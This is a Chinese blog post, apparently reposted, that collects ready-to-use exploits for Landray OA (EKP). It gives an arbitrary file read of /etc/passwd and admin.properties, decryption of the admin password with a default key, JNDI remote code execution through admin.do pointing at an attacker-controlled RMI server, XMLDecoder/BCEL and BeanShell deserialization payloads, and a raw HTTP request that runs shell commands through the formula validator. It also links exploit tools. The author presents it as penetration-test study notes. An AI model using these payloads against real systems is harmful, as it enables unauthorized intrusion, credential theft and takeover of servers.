蓝凌(Landray)OA漏洞常见RCE

这篇具有很好参考价值的文章主要介绍了蓝凌(Landray)OA漏洞常见RCE。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。

任意文件读取漏洞

漏洞描述

蓝凌OA(EKP)存在任意文件读取漏洞可能导致敏感信息泄露。

漏洞复现

漏洞路径:/sys/ui/extend/varkind/custom.jsp,访问后抓包,在body中加入payload:var={“body”:{“file”:“file:///etc/passwd”}},发送post请求。
蓝凌(Landray)OA漏洞常见RCE

SSRF+JNDI远程命令执行

漏洞描述

配合上述任意文件读取漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 可利用 JNDI远程命令执行获取权限。

漏洞复现

利用任意文件读取/WEB-INF/KmssConfig/admin.properties配置文件
蓝凌(Landray)OA漏洞常见RCE由此获得加密的password,据说蓝凌OA默认为DES加密,且有个默认密钥为 kmssAdminKey,可以拿着password在在线网站上尝试解密(返回的password字符串去掉末尾的/r在进行解密)
蓝凌(Landray)OA漏洞常见RCE用解密出来的明文密码尝试登录后台地址:admin.do,此地址也可能由爆破得到:
蓝凌(Landray)OA漏洞常见RCE蓝凌(Landray)OA漏洞常见RCEburp抓包,body添加payload:method=testDbConn&datasource=rmi://vpsip:port/exp,exp构造同常见的如fastjson所用:
蓝凌(Landray)OA漏洞常见RCE写入想执行的命令并编译成恶意类(编译兼容java1.7)后放到web服务器上。再使用marshalsec工具(https://github.com/mbechler/marshalsec)构建一个JNDI服务。
蓝凌(Landray)OA漏洞常见RCE发送payload:
蓝凌(Landray)OA漏洞常见RCE

sysSearchMain.do XMLdecode反序列化(任意文件写入)

漏洞描述

sysSearchMain.do文件,存在任意文件写入漏洞,攻击者获取后台权限后可通过漏洞写入任意文件,也可以通过 custom.jsp 文件未授权写入恶意文件,导致RCE。

漏洞复现

若通过custom.jsp写入,payload为:var={“body”:{“file”:“/sys/search/sys_search_main/sysSearchMain.do?method=editParam”}}&fdParemNames=11&fdParameters=[shellcode]
shellcode:<java> <void class="com.sun.org.apache.bcel.internal.util.ClassLoader"> <void method="loadClass"> <string>$$BCEL$$......</string> <void method="newInstance"></void> </void> </void> </java> //使用了BCEL利用链(BCEL包下的ClassLoader类)
同上一漏洞一样编译恶意exp类//不要使用java8u251以后版本
蓝凌(Landray)OA漏洞常见RCE使用BCEL编码工具:https://github.com/Xd-tl/BCELCode
插入发送:
蓝凌(Landray)OA漏洞常见RCE漏洞成因对FdParameters参数过滤不严,传给ojectXmlDecoder造成反序列化。
tips:如果OA存在bsh可直接执行命令,可直接回显或打入内存马,或者后台洞情况,web管理员权限添加反序列化白名单:如bsh.Intepreter(BeanShell利用链中bash.Interpreter的eval方法)
蓝凌(Landray)OA漏洞常见RCEpayload:var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void class="bsh.Interpreter"><void method="eval"><string>Runtime.getRuntime().exec("calc");</string></void></void></java>
回显payload:
蓝凌(Landray)OA漏洞常见RCE//太菜了不懂回显payload细节

公式编辑器RCE

漏洞描述

dataxml.jsp 、treexml.tmpl等代码执行

漏洞复现

漏洞地址:/data/sys-common/treexml.tmpl、 /sys/common/dataxml.jsp、 /sys/common/treexml.jsp、 /sys/common/treejson.jsp、 /sys/common/datajson.jsp、 /data/sys-common/dataxml、 /data/sys-common/treexml、 /data/sys-common/datajson
以上地址都可以尝试一下
payload如:

POST /sys/ui/extend/varkind/custom.jsp  HTTP/1.1
Host: test.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 176

var={"body":{"file":"/data/sys-common/datajson"}}&s_bean=sysFormulaValidateByJS&script=new java.lang.ProcessBuilder['(java.lang.String[])'](['sh','-c','touch /tmp/1']).start();

s_bean或为RuleFormulaValidate对应treexml.tmplsysFormulaValidateByJS
具体原理和利用区别可查看https://unsafe.sh/go-123305.html
最后再放一个OA集合利用的工具:https://github.com/LittleBear4/OA-EXPTOOL
蓝凌(Landray)OA漏洞常见RCE文章来源地址https://www.toymoban.com/news/detail-403811.html

到了这里,关于蓝凌(Landray)OA漏洞常见RCE的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 蓝凌EIS pdf.aspx 任意文件读取漏洞

    漏洞描述: 蓝凌EIS智慧协同平台是一个简单、高效的工作方式专为成长型企业打造的沟通、协同、社交的移动办公平台,覆盖OA、沟通、客户、人事、知识等管理需求,集合了非常丰富的模块,满足组织企业在知识、项目管理系统建设等需求的一款OA系统。 漏洞描述 蓝凌EI

    2024年01月16日
    浏览(49)
  • 蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞

    免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 蓝凌智慧协同平台eis集合了非常丰富的模块

    2024年02月08日
    浏览(52)
  • 蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现

    蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。 蓝凌EIS智慧协同平台 frm_form_upload.aspx接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文

    2024年01月23日
    浏览(39)
  • 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx 存在 SQL注入漏洞

    产品简介 蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。 漏洞概述 由于蓝凌EIS智慧协同平台 doc_fileedit_word.aspx接口处未对用户输入的SQL语句进行过滤或验证导致

    2024年01月25日
    浏览(41)
  • 【漏洞复现-通达OA】通达OA share身份认证绕过漏洞

    通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器

    2024年02月19日
    浏览(42)
  • thinkphp 5-rce(rce漏洞getshell)

     vulhub靶场 http://xxxxx:8080/?s=/Index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami  验证漏洞 linux系统,可以用touch命令创建文件 http://xxxxx:8080/?s=/Index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]= touch mm.php 再用echo写入一句话 http://xxxxx:8080/index.

    2024年02月14日
    浏览(39)
  • 【漏洞复现-通达OA】通达OA get_contactlist.php 敏感信息泄漏漏洞

    通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。 ● 通达OA2013 ● hunter app.name=\\\"通达 OA\\\" ● 特征 四、漏洞复现

    2024年02月20日
    浏览(39)
  • 【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞

    通达OA get_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件。 ● 通达OA2011 ● hunter app.name=\\\"通达 OA\\\" ● 特征

    2024年02月21日
    浏览(60)
  • RCE漏洞简介

    今天继续给大家介绍渗透测试相关知识,本文主要内容是RCE漏洞简介。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试! 所谓RCE漏洞,即Remote Code/Command Execution,远

    2024年02月13日
    浏览(54)
  • rce 漏洞

    过滤分隔符 ; 1,可以使用%0a代替,%0a其实在某种程度上是最标准的命令链接符号 功能 符号 payload 换行符 %0a ?cmd=123%0als 回车符 %0d ?cmd=123%0dls 连续指令 ; ?1=123;pwd 后台进程 ?1=123pwd 管道 | ?1=123|pwd 逻辑运算 ||或 ?1=123pwd ;    //分号 |    //把前面输出的当作后面的输入 (管道符

    2024年02月07日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包